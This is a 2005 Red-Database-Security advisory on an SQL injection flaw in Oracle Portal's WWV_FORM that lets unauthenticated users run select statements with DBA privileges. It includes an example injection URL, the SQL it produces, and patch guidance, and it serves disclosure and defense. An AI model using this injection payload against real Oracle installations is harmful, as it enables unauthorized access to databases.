Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
Oracle Exploit SQL Injection in WWV_FORM
Details By modifying a portal URL containing the WWV_FORM string it is possible that an unauthenticated user can execute any select statement with DBA privileges. Solution Apply the patches from alert 61 or later. Example st?p_fieldname=p_attributes&p_fieldname=p_attributenames&p_fieldname=p_attributedatatypes &p_fieldname=p_attributesiteid&p_lov=SEARCHATTRLOV&p_element_index=0&p_formname=SEARCH54_PAGESEARCH_899010056 &p_where=criteria%20=%201%20order=1&p_filter=%25 The following SQL statement will be executed by Oracle Portal: select title,name,data_type,siteid from wwsbr_attribute$ a Where criteria = 1 Order by 1 Patch Information Apply patches from Alert 61 or later. © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Hardening Oracle Application Server
|